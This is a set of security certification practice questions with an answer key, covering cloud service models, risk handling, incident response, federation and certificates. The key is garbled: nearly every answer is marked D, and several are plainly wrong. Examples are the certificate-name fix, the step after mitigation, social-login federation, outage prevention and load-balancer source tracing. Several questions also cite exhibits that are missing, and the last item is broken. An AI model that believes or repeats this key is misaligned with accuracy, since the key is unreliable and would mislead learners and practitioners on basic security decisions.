A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements: 1. Support all phases of the SDLC. 2. Use tailored website portal software. 3. Allow the company to build and use its own gateway software. 4. Utilize its own data management platform. 5. Continue using agent-based security tools. Which of the following cloud-computing models should the CIO implement? A. SaaS B. PaaS C. MaaS D. IaaS
Correct Answer: D. IaaS Explanation/Reference: Reference: https://www.bmc.com/blogs/saas-vs-paas-vs-iaas-whats-the-difference-and-how-to-choose/
An enterprise is undergoing an audit to review change management activities when promoting code to production. The audit reveals the following: 1. Some developers can directly publish code to the production environment. 2. Static code reviews are performed adequately. 3. Vulnerability scanning occurs on a regularly scheduled basis per policy. Which of the following should be noted as a recommendation within the audit report? A. Implement short maintenance windows. B. Perform periodic account reviews. C. Implement job rotation. D. Improve separation of duties.
Correct Answer: D. Improve separation of duties.
A security analyst observes the following while looking through network traffic in a company's cloud log: Which of the following steps should the security analyst take FIRST? A. Quarantine 10.0.5.52 and run a malware scan against the host. B. Access 10.0.5.52 via EDR and identify processes that have network connections. C. Isolate 10.0.50.6 via security groups. D. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.
Correct Answer: D. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.
A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis. Which of the following steps would be best to perform FIRST? A. Turn off the infected host immediately. B. Run a full anti-malware scan on the infected host. C. Modify the smb.conf file of the host to prevent outgoing SMB connections. D. Isolate the infected host from the network by removing all network connections.
Correct Answer: D. Isolate the infected host from the network by removing all network connections.
A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment. Which of the following should the security administrator do to mitigate the risk? A. Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement. B. Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management. C. Suggest that the networking team contact the original embedded system's vendor to get an update to the system that does not require Flash. D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.
Correct Answer: D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.
A company's finance department acquired a new payment system that exports data to an unencrypted file on the system. The company implemented controls on the file so only appropriate personnel are allowed access. Which of the following risk techniques did the department use in this situation? A. Accept B. Avoid C. Transfer D. Mitigate
Correct Answer: D. Mitigate
Company A acquired Company . During an audit, a security engineer found Company B's environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A's security program. Which of the following risk-handling techniques was used? A. Accept B. Avoid C. Transfer D. Mitigate
Correct Answer: D. Mitigate Explanation/Reference: Reference: https://www.pivotpointsecurity.com/blog/risk-tolerance-in-business/
A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the Jogs. the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured: Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain? A. Personal health information: Inform the human resources department of the breach and review the DLP logs. B. Account history; Inform the relationship managers of the breach and create new accounts for the affected users. C. Customer IDs: Inform the customer service department of the breach and work to change the account numbers. D. PAN: Inform the legal department of the breach and look for this data in dark web monitoring.
Correct Answer: D. PAN: Inform the legal department of the breach and look for this data in dark web monitoring.
Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts partial responsibility for application- level controls to the cloud provider. In the shared responsibility model, which of the following levels of service meets this requirement? A. laaS B. SaaS C. FaaS D. PaaS
Correct Answer: D. PaaS
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact. Which of the following should the organization perform NEXT? A. Assess the residual risk. B. Update the organization's threat model. C. Move to the next risk in the register. D. Recalculate the magnitude of impact.
Correct Answer: D. Recalculate the magnitude of impact.
A company launched a new service and created a landing page within its website network for users to access the service. Per company policy, all websites must utilize encryption for any authentication pages. A junior network administrator proceeded to use an outdated procedure to order new certificates. Afterward, customers are reporting the following error when accessing a new web page: NET:ERR_CERT_COMMON_NAME_INVALID. Which of the following BEST describes what the administrator should do NEXT? A. Request a new certificate with the correct subject alternative name that includes the new websites. B. Request a new certificate with the correct organizational unit for the company's website. C. Request a new certificate with a stronger encryption strength and the latest cipher suite. D. Request a new certificate with the same information but including the old certificate on the CRL.
Correct Answer: D. Request a new certificate with the same information but including the old certificate on the CRL
A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk? A. Inherent B. Low C. Mitigated D. Residual. E. Transferred
Correct Answer: D. Residual.
A software house is developing a new application. The application has the following requirements: 1. Reduce the number of credential requests as much as possible 2. Integrate with social networks 3. Authenticate users Which of the following is the BEST federation method to use for the application? A. WS-Federation B. OpenID C. OAuth D. SAML
Correct Answer: D. SAML Explanation/Reference: Reference: https://auth0.com/blog/how-saml-authentication-works/
A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility. Which of the following systems should the consultant review before making a recommendation? A. CAN B. ASIC C. FPGA D. SCADA
Correct Answer: D. SCADA Explanation/Reference: Reference: https://www.sciencedirect.com/topics/computer-science/protective-relay
An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk? A. SDLC attack B. Side-load attack C. Remote code signing D. Supply chain attack
Correct Answer: D. Supply chain attack
A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior. Which of the following would BEST safeguard the APIs? (Choose two.) A. Bot protection B. OAuth 2.0 C. Input validation D. Autoscaling endpoints E. Rate limiting F. CSRF protection
Correct Answer: DE Autoscaling endpoints Rate limiting Explanation/Reference: Reference: https://stackoverflow.com/questions/3161548/how-do-i-prevent-site-scraping
Due to adverse events, a medium-sized corporation suffered a major operational disruption that caused its servers to crash and experience a major power outage. Which of the following should be created to prevent this type of issue in the future? A. SLA B. BIA C. BCM D. BCP E. RTO
Correct Answer: E. RTO
An auditor Is reviewing the logs from a web application to determine the source of an Incident. The web application architecture Includes an Internet-accessible application load balancer, a number of web servers In a private subnet, application servers, and one database server In a tiered configuration. The application load balancer cannot store the logs. The following are sample log snippets: Which of the following should the auditor recommend to ensure future incidents can be traced back to the sources? A. Enable the x-Forwarded-For header al the load balancer. B. Install a software-based HIDS on the application servers. C. Install a certificate signed by a trusted CA. D. Use stored procedures on the database server. E. Store the value of the $_server ( ` REMOTE_ADDR '
received by the web servers. ]Correct Answer: C. Install a certificate signed by a trusted CA.
